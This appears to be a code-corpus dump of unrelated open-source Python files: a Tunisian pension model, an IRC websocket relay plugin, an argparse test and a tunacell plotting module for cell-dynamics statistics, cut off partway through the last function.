DATASET_DEFAULT_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'datasets'))
WEBCLIENT_VIDEOS_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'ers_frontend/_public/datasets/$datasetId$/videos'))
openfisca/openfisca-tunisia-pension | openfisca_tunisia_pension/model/data.py | 1 | 2273 | # -*- coding: utf-8 -*-
from openfisca_tunisia_pension.model.base import *
# raic -> raci
# Socio-economic data
# Donnée d'entrée de la simulation à fournir à partir d'une enquête ou
# à générer avec un générateur de cas type
class date_naissance(Variable):
    """Birth date of the individual (set once, valid forever)."""
    value_type = date
    default_value = date(1970, 1, 1)
    entity = Individu
    label = u"Date de naissance"
    definition_period = ETERNITY
class salaire(Variable):
    """Yearly salary of the individual."""
    value_type = float
    entity = Individu
    label = u"Salaires"
    definition_period = YEAR
class age(Variable):
    """Age of the individual, per year."""
    value_type = int
    entity = Individu
    label = u"Âge"
    definition_period = YEAR
class trimestres_valides(Variable):
    """Number of validated quarters (pension contribution periods)."""
    value_type = int
    entity = Individu
    label = u"Nombre de trimestres validés"
    definition_period = YEAR
class TypesRegimeSecuriteSociale(Enum):
    """Tunisian social security schemes (labels are user-facing, kept in French)."""
    __order__ = 'rsna rsa rsaa rtns rtte re rtfr raci salarie_cnrps pensionne_cnrps'
    # Needed to preserve the enum order in Python 2
    rsna = u"Régime des Salariés Non Agricoles"
    rsa = u"Régime des Salariés Agricoles"
    rsaa = u"Régime des Salariés Agricoles Amélioré"
    rtns = u"Régime des Travailleurs Non Salariés (secteurs agricole et non agricole)"
    rtte = u"Régime des Travailleurs Tunisiens à l'Etranger"
    re = u"Régime des Etudiants, diplômés de l'enseignement supérieur et stagiaires"
    rtfr = u"Régime des Travailleurs à Faibles Revenus (gens de maisons, travailleurs de chantiers, et artisans travaillant à la pièce)"
    raci = u"Régime des Artistes, Créateurs et Intellectuels"
    salarie_cnrps = u"Régime des salariés affilés à la Caisse Nationale de Retraite et de Prévoyance Sociale"
    pensionne_cnrps = u"Régime des salariés des pensionnés de la Caisse Nationale de Retraite et de Prévoyance Sociale"
# references :
# http://www.social.gov.tn/index.php?id=49&L=0
# http://www.paie-tunisie.com/412/fr/83/reglementations/regimes-de-securite-sociale.aspx
class regime_securite_sociale(Variable):
    """Social security scheme of the retiree (defaults to RSNA)."""
    value_type = Enum
    possible_values = TypesRegimeSecuriteSociale
    default_value = TypesRegimeSecuriteSociale.rsna
    entity = Individu
    label = u"Régime de sécurité sociale du retraité"
    definition_period = YEAR
Sulter/MASTERlinker | plugins/wsserver.py | 1 | 4384 | # Plugin that creates a websocket server, and feeds all the messages written to the connected clients
import includes.helpers as helpers
import socket
import re
import base64
import hashlib
import struct
import threading
import select
import logging
class wsserver(helpers.Plugin):
    """IRC-bot plugin that starts a websocket server and forwards every
    channel message to all connected websocket clients."""
    def __init__(self, parent):
        super().__init__(parent)
        # Start the websocket server thread on port 4446.
        self.server = WsServerThread(4446)
        self.server.start()
    def handle_pm(self, msg_data):
        # Private messages are deliberately ignored.
        pass
    def handle_message(self, msg_data):
        self.server.send_msg_all(msg_data["nick"] + ":" + msg_data["message"])  # forward "nick:message" to all listening sockets
class WsServerThread(threading.Thread):
    """Minimal RFC 6455 websocket server thread (push-only, no client input).

    NOTE(review): this is Python 2 code -- frames and handshake responses are
    built as `str` and mixed with `struct.pack` output; under Python 3 the
    str/bytes mixing would fail. Verify target interpreter before porting.
    """
    def __init__(self, port):
        # Make server (non-blocking socket) listening on all interfaces.
        self.sserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sserver.setblocking(0)
        self.sserver.bind(("", port))
        self.sserver.listen(5)
        # Sockets of clients that completed the websocket handshake.
        self.client_list = []
        threading.Thread.__init__(self)
    def send_msg_all(self, msg):
        """Send *msg* as a text frame to every connected client."""
        for sock in self.client_list:
            self.send_msg(sock, msg)
    def run(self):
        """Accept new clients and drop the ones that closed their socket."""
        while 1:
            # We wait until we got something that is ready to read
            ready_to_read, ready_to_write, in_error = select.select([self.sserver] + self.client_list, [],
                                                                    [self.sserver] + self.client_list, 60)
            if in_error:
                print("ERROR! in sockets")
                print(in_error)
            for reader in ready_to_read:
                if reader == self.sserver:  # the listening socket is readable when a connection is pending
                    clientsocket, address = self.sserver.accept()
                    if self.handshake(clientsocket) is True and len(
                            self.client_list) < 100:  # only add socket to the list if the handshake succeeded AND we have less than 100 connections already!
                        self.client_list.append(clientsocket)
                        logging.debug("wsserver: connection accepted from: %s", str(address))
                else:  # one of the other sockets has a message for us, but we only check if it's empty, because that means the socket closed
                    m = ""
                    try:
                        m = reader.recv(4096)
                    except:
                        # NOTE(review): bare except silently ignores recv errors
                        # (and `do_noting` is a typo for a no-op placeholder);
                        # the empty-read check below then drops the client.
                        do_noting = 0
                    if len(m) < 1:
                        self.client_list.remove(reader)
                        reader.close()
    def send_msg(self, sock, message):
        """Frame *message* as a single websocket text frame and send it.

        Framing per https://tools.ietf.org/html/rfc6455#page-28
        """
        length = len(message)
        frame = "\x81"  # The first byte setting the FIN bit to 1 and sending the opcode 0x1 that tells the clients the payload data is text
        if length > 65025:
            raise Exception("Error - payload to large")
        elif length > 125:
            # extended payload length: marker byte 126 + 16-bit big-endian length
            frame = frame + chr(126)
            frame = frame + struct.pack(">H", length)  # here we add the 16-bit representation of the length
            frame = frame + message
        else:
            frame = frame + chr(length) + message
        ready_to_read, ready_to_write, in_error = select.select([], [sock], [], 1)
        if sock in ready_to_write:
            try:
                sock.sendall(frame)
            except:
                # drop clients we can no longer write to
                self.client_list.remove(sock)
                sock.close()
    def handshake(self, sock):
        """Perform the server side of the websocket opening handshake.

        Returns True on success, False when the client sent no readable
        header, provided no Sec-WebSocket-Key, or the socket is not writable.
        """
        # GUID fixed by RFC 6455 for computing Sec-WebSocket-Accept.
        magic_string = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
        # Get the header, but only if the socket has anything to say (otherwise just discard it)
        ready_to_read, ready_to_write, in_error = select.select([sock], [], [], 1)
        if sock in ready_to_read:
            header = sock.recv(4096)
        else:
            return False
        # here we should probably add some more protocol checking stuff. But this should work with any real browsers (chromium/firefox, at least for now)
        # make the key, using the key from the header and the magic string
        key = re.search("(Sec-WebSocket-Key: )(\S+)", header)
        if not key:
            return False  # return false if the client didn't provide a key
        key = key.group(2)
        key = key + magic_string
        # Sec-WebSocket-Accept = base64(sha1(client key + GUID))
        respond_key = base64.b64encode(hashlib.sha1(key).digest())
        # Handshake
        respond_message = "HTTP/1.1 101 Switching Protocols\r\n"
        respond_message = respond_message + "Upgrade: websocket\r\n"
        respond_message = respond_message + "Connection: Upgrade\r\n"
        respond_message = respond_message + "Sec-WebSocket-Accept: %s\r\n\r\n" % respond_key
        ready_to_read, ready_to_write, in_error = select.select([], [sock], [], 1)  # make sure it's ready to write
        if sock in ready_to_write:
            sock.sendall(respond_message)
            return True
        else:
            return False
| mit | -3,755,545,347,154,293,000 | 37.45614 | 149 | 0.646898 | false | 3.650291 | false | false | false |
timlau/yumex | src/test/argpase.py | 1 | 1127 | # need the python-argparse package installed
import argparse
# create the parser
main_parser = None
def setupParser():
    """Build the global `main_parser` with shared base options and one
    sub-command per entry in `cmds`.

    NOTE(review): Python 2 code (`xrange`); the shared options are attached
    via a parent parser so they are accepted both globally and per command.
    """
    global main_parser
    base_parser = argparse.ArgumentParser(add_help=False)
    parser = base_parser.add_argument_group('base options')
    parser.add_argument("-d", "--debuglevel", dest="debuglevel", action="store", choices=xrange(10),
                        default=2, help="yum output level", type=int)
    parser.add_argument("-e","--errorlevel", dest="errorlevel", action="store", choices=xrange(10),
                        default=2, help="yum error level", type=int)
    main_parser = argparse.ArgumentParser(description='GUI for the yum package manager', parents = [base_parser])
    subparsers = main_parser.add_subparsers()
    cmds = ['install','remove']
    # add one sub-command per entry in cmds ('install' and 'remove'),
    # each taking zero or more package names
    for c in cmds:
        parser_cmd = subparsers.add_parser(c, help='%s a package' % c, parents = [base_parser])
        parser_cmd.add_argument('package', nargs='*')
if __name__ == '__main__':
    # Build the global parser, then parse and dump the command line
    # (Python 2 print statement).
    setupParser()
    # parse the command line
    args = main_parser.parse_args()
    print args
LeBarbouze/tunacell | tunacell/plotting/dynamics.py | 1 | 34918 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
This module defines plotting functions for the statistics of the dynamics.
"""
from __future__ import print_function
import os
import numpy as np
import collections
import logging
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib import ticker
import matplotlib.gridspec as gridspec
from tunacell.filters.main import FilterSet
from tunacell.stats.single import Univariate, StationaryUnivariate
from tunacell.stats.two import StationaryBivariate
from tunacell.io import text
from .helpers import _set_axis_limits, _set_timelabel, _set_time_axis_ticks
# few variables that will be used through all functions
default_fontsize = mpl.rcParams['font.size']
default_lw = mpl.rcParams['lines.linewidth']
def _set_condition_list(univariate, show_cdts='master'):
    """Set the list of conditions to show.

    Parameters
    ----------
    show_cdts : str or FilterSet or iterable on these (default 'master')
        the conditions to plot: use 'all' for all conditions in univariate,
        'master' for unconditioned data only, the string representation (or
        label) of a particular condition, a FilterSet, or an iterable thereof
    univariate : Univariate instance
        conditions will be matched against conditions stored in univariate

    Returns
    -------
    list of FilterSet (conditions) to show; 'master' is always included first
    """
    # collections.Iterable was removed in Python 3.10; use collections.abc
    from collections.abc import Iterable

    conditions = ['master', ]  # list of conditions to be plotted
    if show_cdts == 'all':
        conditions = ['master', ] + univariate.cset
    elif show_cdts == 'master':
        pass
    elif isinstance(show_cdts, str):
        # a single condition given by its repr/label; strings are iterable,
        # so this branch must come before the generic Iterable test --
        # otherwise the string would be iterated character by character
        _append_cdt(univariate, show_cdts, conditions)
    elif isinstance(show_cdts, Iterable):
        for item in show_cdts:
            _append_cdt(univariate, item, conditions)
    else:
        _append_cdt(univariate, show_cdts, conditions)
    return conditions
def _append_cdt(univariate, this_cdt, cdt_list):
    """Append the condition matching *this_cdt* in *univariate* to *cdt_list*.

    Parameters
    ----------
    univariate : :class:`Univariate` instance
    this_cdt : str or :class:`FilterSet` instance
        either the condition instance or its string representation
    cdt_list : list of conditions
        list of conditions to append the matching condition to

    Nothing is appended when no stored condition matches, or when *this_cdt*
    is neither a string nor a FilterSet.
    """
    # Normalize the lookup target to the repr-string of the condition.
    if isinstance(this_cdt, str):
        target = this_cdt
    elif isinstance(this_cdt, FilterSet):
        target = repr(this_cdt)
    else:
        return
    # Append the first stored condition whose repr matches the target.
    # TODO: compare also cdt.label
    for candidate in univariate.cset:
        if repr(candidate) == target:
            cdt_list.append(candidate)
            return
def plot_onepoint(univariate, show_cdts='all', show_ci=False,
                  mean_ref=None, var_ref=None,
                  axe_xsize=6., axe_ysize=2.,
                  time_range=(None, None),
                  time_fractional_pad=.1,
                  counts_range=(None, None),
                  counts_fractional_pad=.1,
                  average_range=(None, None),  # auto
                  average_fractional_pad=.1,
                  variance_range=(None, None),
                  variance_fractional_pad=.1,
                  show_legend=True,
                  show_cdt_details_in_legend=False,
                  use_obs_name=None,
                  save=False, user_path=None, ext='.png',
                  verbose=False):
    """Plot one point statistics: counts, average, and variance.

    One point functions are plotted for each condition set up in *show_cdts*
    argument: 'all' for all conditions, or the string representation (or label)
    of a particular condition (or a list thereof).

    Parameters
    ----------
    univariate : Univariate instance
    show_cdts : str (default 'all')
        must be either 'all', or 'master', or the repr of a condition, or a
        list thereof
    show_ci : bool {False, True}
        whether to show 99% confidence interval
    mean_ref : float
        reference mean value: what user expect to see as sample average to
        compare with data
    var_ref : float
        reference variance value: what user expect to see as sample variance to
        compare with data
    axe_xsize : float (default 6)
        size of the x-axis (inches)
    axe_ysize : float (default 2.)
        size if a single ax y-axis (inches)
    time_range : couple of floats (default (None, None))
        specifies (left, right) bounds
    time_fractional_pad : float (default .1)
        fraction of x-range to add as padding
    counts_range : couple of floats (default (None, None))
        specifies range for the Counts y-axis
    counts_fractional_pad : float (default .2)
        fractional amount of y-range to add as padding
    average_range : couple of floats (default (None, None))
        specifies range for the Average y-axis
    average_fractional_pad : couple of floats (default .2)
        fractional amounts of range to padding
    variance_range : couple of floats (default (None, None))
        specifies range for the Variance y-axis
    variance_fractional_pad : couple of floats (default .2)
        fractional amounts of range to padding
    show_legend : bool {True, False}
        print out legend
    show_cdt_details_in_legend : bool {False, True}
        show details about filters
    use_obs_name : str (default None)
        when filled, the plot title will use this observable name instead
        of looking for the observable registered name
    save : bool {False, True}
        whether to save plot
    user_path : str (default None)
        user defined path where to save figure; default is canonical path
        (encouraged)
    ext : str {'.png', '.pdf'}
        extension to be used when saving file
    verbose : bool {False, True}
    """
    if not isinstance(univariate, Univariate):
        raise TypeError('Input is not {}'.format(Univariate))
    # three stacked panels: counts, average, variance
    fig, axs = plt.subplots(3, 1, figsize=(axe_xsize, 3*axe_ysize))
    obs = univariate.obs
    timelabel = _set_timelabel(obs)  # define time label
    main_handles = []  # main legend
    ci_handles = []  # additional legend (TODO: check if necessary)
    # accumulators used later to compute axis limits over all conditions
    all_times = []
    all_counts = []
    all_average = []
    all_variance = []
    # build condition list
    conditions = _set_condition_list(univariate, show_cdts)
    for index, cdt in enumerate(conditions):
        if cdt == 'master':
            c_repr = 'master'
            c_label = 'all samples'
            lw = default_lw + 1
            alpha = 1
            alpha_fill = .5
        else:
            c_repr = repr(cdt)
            if show_cdt_details_in_legend:
                c_label = str(cdt)
            else:
                c_label = cdt.label
            lw = default_lw
            alpha = .8
            alpha_fill = 0.3
        # keep only time points where at least one sample was counted
        ok = np.where(univariate[c_repr].count_one > 0)
        times = univariate[c_repr].time[ok]
        all_times.extend(times)
        counts = univariate[c_repr].count_one[ok]
        all_counts.extend(counts)
        mean = univariate[c_repr].average[ok]
        all_average.extend(mean)
        var = univariate[c_repr].var[ok]
        all_variance.extend(var)
        std = univariate[c_repr].std[ok]
        se = 2.58 * std / np.sqrt(counts)  # standard error 99% CI Gaussian
        # var = np.diagonal(univariate[c_repr].autocorr)
        line_counts, = axs[0].plot(times, counts, alpha=alpha, lw=lw,
                                   label='{}'.format(c_label))
        main_handles.append(line_counts)
        color = line_counts.get_color()
        average, = axs[1].plot(times, mean, color=color, alpha=0.8, lw=lw, label=c_label)
        if show_ci:
            fill_std = axs[1].fill_between(times, mean-se, mean+se,
                                           facecolor=color, alpha=alpha_fill)
            ci_handles.append(fill_std)
            # include CI bounds in the y-range computation
            all_average.extend(mean-se)
            all_average.extend(mean+se)
        variance, = axs[2].plot(times, var, color=color, alpha=0.8, lw=lw, label=c_label)
    # adding reference lines
    if mean_ref is not None:
        mref = axs[1].axhline(mean_ref, ls='-.', color='C7', alpha=.7,
                              label='reference value')
        main_handles.append(mref)
        all_average.append(mean_ref)
    if var_ref is not None:
        vref = axs[2].axhline(var_ref, ls='-.', color='C7', alpha=.7,
                              label='reference value')
        # check last label if mean_ref has been saved (avoid duplicate legend entry)
        last_lab = main_handles[-1].get_label()
        if last_lab != vref.get_label():
            main_handles.append(vref)
        all_variance.append(var_ref)
    # print vertical line at tref
    if obs.timing != 'g' and isinstance(obs.tref, float):
        for ax in axs:
            vtref = ax.axvline(univariate.obs.tref, color='C7', ls='--',
                               alpha=.5, label='reference time in obs')
        main_handles.append(vtref)  # only the last one
    # ## limits and ticks ##
    # xaxis
    for ax in axs:
        left, right = _set_axis_limits(ax, all_times, which='x', pad=time_fractional_pad,
                                       force_range=time_range)
    # locator
    locator = _set_time_axis_ticks(axs[0], obs, bounds=(left, right))
    for ax in axs:
        ax.xaxis.set_major_locator(locator)
    # yaxis limits
    _set_axis_limits(axs[0], all_counts, which='y', pad=counts_fractional_pad,
                     force_range=counts_range)
    axs[0].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3, integer=True))
    # average
    _set_axis_limits(axs[1], all_average, which='y', pad=average_fractional_pad,
                     force_range=average_range)
    axs[1].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3))
    # variance
    _set_axis_limits(axs[2], all_variance, which='y', pad=variance_fractional_pad,
                     force_range=variance_range)
    axs[2].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3))
    # tick formatter: move the scientific-notation offset into the axes area
    formatter = ticker.ScalarFormatter(useMathText=True, useOffset=False)
    formatter.set_powerlimits((-2, 4))
    for ax in axs:
        ax.yaxis.set_major_formatter(formatter)
        t = ax.yaxis.get_offset_text()
        plt.draw()
        msg = t.get_text()
        ax.text(0, .95, msg, ha='left', va='top', transform=ax.transAxes)
        t.set_visible(False)
    axs[0].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
    axs[1].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
    axs[2].set_xlabel(timelabel, x=.95, horizontalalignment='right',
                      fontsize='medium')
    # hide intermediate x axis
    for ax in axs[:2]:
        ax.spines['bottom'].set_visible(False)
        ax.tick_params(axis='x', colors='C7')
    for ax in axs[1:]:
        ax.spines['top'].set_color('C7')
    axs[0].set_ylabel('Counts', fontsize='medium')
    axs[1].set_ylabel('Average', fontsize='medium')
    axs[2].set_ylabel('Variance', fontsize='medium')
    # ## legend ##
    # C.I.
    if ci_handles:
        ci = ci_handles[0]
        # ci.set_color('C7')
        ci.set_label('.99 C.I.')
        main_handles.append(ci)
    handles = main_handles[:]
    labels = [h.get_label() for h in handles]
    if show_legend:
        axs[-1].legend(handles=handles, labels=labels, loc='upper left',
                       bbox_to_anchor=(0, -.5/axe_ysize))
    # title
    latex_obs = obs.latexify(use_name=use_obs_name)
    axs[0].text(0.5, 1+.2/axe_ysize,
                r'{}'.format(latex_obs),
                size='large',
                horizontalalignment='center',
                verticalalignment='bottom',
                transform=axs[0].transAxes)
    fig.subplots_adjust(hspace=0)
    if save:
        univ = univariate
        try:
            obs_path = univ._get_obs_path(user_root=user_path, write=False)
        except text.MissingFolderError:
            # it means data has not been written yet
            # export data and then get
            univ.export_text(analysis_folder=user_path)
            obs_path = univ._get_obs_path(user_root=user_path, write=False)
        bname = 'plot_onepoint_' + univ.obs.name + '_' + univ.region.name + ext
        fname = os.path.join(obs_path, bname)
        fig.savefig(fname, bbox_inches='tight', pad_inches=0)
        if verbose:
            print('Figure saved as {}'.format(fname))
    return fig
def plot_twopoints(univariate, condition_label=None, trefs=None, ntrefs=4,
                   axe_xsize=6., axe_ysize=2.,
                   time_range=(None, None),
                   time_fractional_pad=.1,
                   counts_range=(None, None),
                   counts_fractional_pad=.1,
                   corr_range=(None, None),  # auto
                   corr_fractional_pad=.1,
                   delta_t_max=None,
                   show_exp_decay=None,
                   show_legend=True,
                   show_cdt_details_in_legend=False,
                   use_obs_name=None,
                   save=False, ext='.png', verbose=False):
    """Plot two-point functions: counts and autocorrelation functions.

    These plots are able to show only one extra condition with 'master', and
    are plotted for a set of time of references.

    Parameters
    ----------
    univariate : :class:`Univariate` instance
    condition_label : str (default None)
        must be the repr of a given FilterSet
    trefs : list of floats (default None)
        indicate the times that you would like to have as references;
        if left empty/None, reference times will be computed automatically
    ntrefs : int
        if trefs is empty, number of times of reference to display
    axe_xsize : float (default 6)
        size of the x-axis (inches)
    axe_ysize : float (default 2.)
        size if a single ax y-axis (inches)
    time_range : couple of floats (default (None, None))
        specifies (left, right) bounds
    time_fractional_pad : float (default .1)
        fraction of x-range to add as padding
    counts_range : couple of floats (default (None, None))
        specifies range for the Counts y-axis
    counts_fractional_pad : float (default .2)
        fractional amount of y-range to add as padding
    corr_range : couple of floats (default (None, None))
        specifies range for the Average y-axis
    corr_fractional_pad : couple of floats (default .2)
        fractional amounts of range to padding
    delta_t_max : float (default None)
        when given, bottom plot will be using this max range symmetrically;
        otherwise, will use the largest intervals found in data (often too
        large to see something)
    show_exp_decay : float (default None)
        when a floating point number is passed, a light exponential decay
        curve is plotted for each tref
    show_legend : bool {True, False}
        print out legend
    show_cdt_details_in_legend : bool {False, True}
        show details about filters
    use_obs_name : str (default None)
        when filled, the plot title will use this observable name instead
        of looking for the observable registered name
    save : bool {False, True}
        whether to save figure at canonical path
    ext : str {'.png', '.pdf'}
        extension to be used when saving figure
    verbose : bool {False, True}
    """
    obs = univariate.obs
    timelabel = _set_timelabel(obs)  # define time label
    # get period from eval times
    if len(univariate.eval_times) > 0:
        period = univariate.eval_times[1] - univariate.eval_times[0]
    # or from experiment metadata
    else:
        period = univariate.exp.period
    # three stacked panels: counts, a(tref, t), a(tref, t - tref)
    fig, axs = plt.subplots(3, 1, figsize=(axe_xsize, 3*axe_ysize))
    # choice of index/indices for time of reference
    times = univariate['master'].time
    npoints = len(times)
    if not trefs:
        logging.info('Determining trefs...')
        di = npoints // ntrefs + 1
        indices = np.arange(0, npoints, di, dtype=int)
        trefs = times[indices]
        logging.info(trefs)
    # accumulators used later to compute axis limits
    all_times = []
    all_counts = []
    all_corr = []
    handles = []
    # prep work for latex printing (raw string: '\m' is not a valid escape)
    latex_ref = r'{{\mathrm{{ref}}}}'
    if obs.timing == 'g':
        prefix = 'g'
        units = ''
    else:
        prefix = 't'
        units = 'mins'
    conditions = ['master', ] + univariate.cset
    for index, cdt in enumerate(conditions):
        if cdt == 'master':
            c_repr = 'master'
            c_label = 'all samples'
            lw = default_lw + 1
            lt = '-'
            alpha = .8
        elif cdt.label == condition_label or str(cdt) == condition_label or repr(cdt) == condition_label:
            c_repr = repr(cdt)
            if show_cdt_details_in_legend:
                c_label = str(cdt)
            else:
                c_label = cdt.label
            lw = default_lw
            lt = '--'
            alpha = .6
        # we plot master and one condition if given, not more...
        else:
            continue
        times = univariate[c_repr].time
        counts = univariate[c_repr].count_two
        corr = univariate[c_repr].autocorr
        var = np.diagonal(corr)
        valid = counts != 0
        for tref in trefs:
            # this tref may not be in conditioned data (who knows)
            if np.amin(np.abs(times - tref)) > period:
                continue
            index = np.argmin(np.abs(times - tref))
            if obs.timing == 'g':
                lab = '{:d}'.format(tref)
            else:
                lab = '{:.0f}'.format(tref)
            line_label = r'$ {}_{} = {}$ {} ({})'.format(prefix, latex_ref, lab, units, c_label)
            ok = np.where(counts[index, :] > 0)
            # if len(ok[0]) == 0:
            #     continue
            # time limits
            all_times.extend(times[ok])
            dat, = axs[0].plot(times[ok], counts[index, :][ok],
                               ls=lt, lw=lw, alpha=alpha, label=line_label)
            handles.append(dat)
            all_counts.extend(counts[index, :][ok])
            color = dat.get_color()
            # vertical marker at tref on the counts panel
            axs[0].plot((tref, tref), (0, counts[index, index]),
                        ls=':', color=color)
            axs[1].axhline(0, ls='-', color='C7', alpha=.3)  # thin line at 0
            dat, = axs[1].plot(times[valid[index, :]],
                               corr[index, :][valid[index, :]]/var[index],
                               ls=lt, lw=lw, alpha=alpha)
            all_corr.extend(corr[index, :][valid[index, :]]/var[index])
            color = dat.get_color()
            axs[1].axvline(tref, ymin=0.1, ymax=0.9, ls=':', color=color)
            axs[2].axhline(0, ls='-', color='C7', alpha=.3)  # thin line at 0
            # same autocorrelation, re-centered on tref
            axs[2].plot(times[valid[index, :]] - tref,
                        corr[index, :][valid[index, :]]/var[index], ls=lt, lw=lw, alpha=alpha)
    # ## limits and ticks ##
    # xaxis
    for ax in axs[:2]:
        left, right = _set_axis_limits(ax, all_times, which='x',
                                       pad=time_fractional_pad,
                                       force_range=time_range)
        hrange = right - left
        ax.xaxis.set_major_locator(ticker.MaxNLocator(integer=True))
    # bottom plot : try to zoom over provided range
    if delta_t_max is not None:
        axs[2].set_xlim(left=-delta_t_max, right=delta_t_max)
    # if not provided, compute automatic ranges (not pretty usually)
    else:
        axs[2].set_xlim(left=-hrange, right=hrange)
    axs[2].xaxis.set_major_locator(ticker.MaxNLocator(integer=True))
    # add exponential decay
    if show_exp_decay is not None:
        tt = np.linspace(left, right, 100)
        dd = np.linspace(-hrange, hrange, 100)
        lab = r'$t_{{\mathrm{{decay}}}} = {:.1f}$ {}'.format(1./show_exp_decay, units)
        for tref in trefs:
            axs[1].plot(tt, np.exp(-show_exp_decay * np.abs(tt - tref)),
                        ls='-.', color='C7', alpha=.7)
        dec, = axs[2].plot(dd, np.exp(-show_exp_decay * np.abs(dd)),
                           ls='-.', color='C7', alpha=.7, label=lab)
        all_corr.extend(np.exp(-show_exp_decay * np.abs(dd)))
        handles.append(dec)
    # ## yaxis limits ##
    # counts
    _set_axis_limits(axs[0], all_counts, which='y', pad=counts_fractional_pad,
                     force_range=counts_range)
    axs[0].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3, integer=True))
    # corr
    for ax in axs[1:]:
        _set_axis_limits(ax, all_corr, which='y', pad=corr_fractional_pad,
                         force_range=corr_range)
        ax.yaxis.set_major_locator(ticker.MaxNLocator(nbins=3))
    # legend
    labels = [h.get_label() for h in handles]
    axs[-1].legend(handles=handles, labels=labels, loc='upper left',
                   bbox_to_anchor=(0, -.5/axe_ysize), labelspacing=0.2)  # reduce labelspacing because of LaTeX
    # tick formatter: move the scientific-notation offset into the axes area
    formatter = ticker.ScalarFormatter(useMathText=True, useOffset=False)
    formatter.set_powerlimits((-2, 4))
    for ax in axs:
        ax.yaxis.set_major_formatter(formatter)
        t = ax.yaxis.get_offset_text()
        plt.draw()
        msg = t.get_text()
        ax.text(0, .95, msg, ha='left', va='top', transform=ax.transAxes)
        t.set_visible(False)
    axs[0].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
    axs[1].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
    axs[2].set_xlabel(timelabel, x=.95, horizontalalignment='right',
                      fontsize='medium')
    # hide intermediate x axis
    for ax in axs[:1]:
        ax.spines['bottom'].set_visible(False)
        ax.tick_params(axis='x', colors='C7')
    for ax in axs[1:2]:
        ax.spines['top'].set_color('C7')
    # ylabels
    axs[0].set_ylabel(r'# $\langle t_{\mathrm{ref}} | t \rangle$',
                      fontsize='medium')
    axs[1].set_ylabel(r'$a(t_{\mathrm{ref}}, t)$',
                      fontsize='medium')
    axs[2].set_ylabel(r'$a(t_{\mathrm{ref}}, t- t_{\mathrm{ref}})$',
                      fontsize='medium')
    # title
    latex_obs = obs.latexify(use_name=use_obs_name)
    axs[0].text(0.5, 1+.2/axe_ysize,
                r'{}'.format(latex_obs),
                size='large',
                horizontalalignment='center',
                verticalalignment='bottom',
                transform=axs[0].transAxes)
    fig.subplots_adjust(hspace=0.)
    # save fig at canonical path
    if save:
        # export data files if not existing yet
        try:
            obs_path = univariate._get_obs_path(write=False)
        except text.MissingFolderError:
            univariate.write_text()
        if condition_label is None:
            univc = univariate.master
        else:
            univc = univariate[condition_label]
        cdt_path = univc._get_path()
        bname = 'plot_twopoints_' + obs.name + '_' + univariate.region.name + ext
        fname = os.path.join(cdt_path, bname)
        fig.savefig(fname, bbox_inches='tight', pad_inches=0)
        if verbose:
            print('Figure saved as {}'.format(fname))
    return fig
def plot_stationary(stationary, show_cdts='all',
                    axe_xsize=6., axe_ysize=2.,
                    time_range=(None, None),
                    time_fractional_pad=.1,
                    time_guides=(0., ),
                    counts_range=(None, None),
                    counts_fractional_pad=.1,
                    corr_range=(None, None),  # auto
                    counts_logscale=False,
                    corr_fractional_pad=.1,
                    corr_logscale=False,
                    corr_guides=(0., ),
                    show_exp_decay=None,
                    show_legend=True, show_cdt_details_in_legend=False,
                    use_obs_name=None,
                    save=False, ext='.png', verbose=False):
    """Plot stationary autocorrelation (or cross-correlation).

    The figure stacks two panels sharing the time axis: sample counts on
    top, normalized (auto- or cross-) correlation below.

    Parameters
    ----------
    stationary : StationaryUnivariate or StationaryBivariate instance
    show_cdts : str (default 'all')
        which conditions to show; forwarded to the condition-list builder
    axe_xsize : float (default 6)
        size (in inches) of the x-axis
    axe_ysize : float (default 2)
        size (in inches) of the individual y-axis
    time_range : couple of floats
        bounds for time (x-axis)
    time_fractional_pad : float
        fractional padding for x-axis
    time_guides : sequence of floats (default (0., ))
        values where to plot dotted grey vertical lines
    counts_range : couple of ints
        bounds for counts axis
    counts_fractional_pad : float
        fractional padding for counts axis
    corr_range : couple of floats
        bounds for correlation values
    counts_logscale : bool {False, True}
        use logscale for counts axis
    corr_fractional_pad : float
        fractional padding for correlation values
    corr_logscale : bool {False, True}
        use logscale for correlation values (symlog is used to display
        symmetrically negative values)
    corr_guides : sequence of floats
        values where to plot dotted grey horizontal lines
    show_exp_decay : float (default None)
        whether to plot an exponential decay with corresponding rate
        exp(-rate * t)
    show_legend : bool {True, False}
        whether to display the legend below the correlation panel
    show_cdt_details_in_legend : bool {False, True}
        when True, use the full condition representation as legend label
        instead of its short label
    use_obs_name : str, couple of str, or None (default None)
        when filled, the plot title will use this observable name instead
        of looking for the observable registered name; for bivariate input
        a couple of names can be given (one per observable)
    save : bool {False, True}
        whether to save plot at canonical path
    ext : str {'.png', '.pdf'}
        extension used for file
    verbose : bool {False, True}
        when True, print the filename the figure has been saved to

    Returns
    -------
    fig : Figure instance

    Raises
    ------
    TypeError
        when `stationary` is neither a StationaryUnivariate nor a
        StationaryBivariate instance
    """
    def _relocate_offset_text(ax):
        # Move the y-axis scale offset text (e.g. '1e3') from its default
        # position (above the axis, where it collides with the neighbouring
        # panel) to the top-left corner inside the axes.
        t = ax.yaxis.get_offset_text()
        plt.draw()  # force a render so the offset text gets computed
        msg = t.get_text()
        ax.text(0, .95, msg, ha='left', va='top', transform=ax.transAxes)
        t.set_visible(False)

    if not isinstance(stationary, (StationaryUnivariate, StationaryBivariate)):
        msg = ('Input is not an instance of '
               '{}'.format(StationaryUnivariate) + ' or of '
               '{}'.format(StationaryBivariate))
        raise TypeError(msg)
    if isinstance(stationary, StationaryUnivariate):
        obs = stationary.obs
        timelabel = _set_timelabel(obs, use_tref=False)
    elif isinstance(stationary, StationaryBivariate):
        obs = [uni.obs for uni in stationary.univariates]
        timelabel = _set_timelabel(obs[0], use_tref=False)
    if 'minutes' in timelabel:
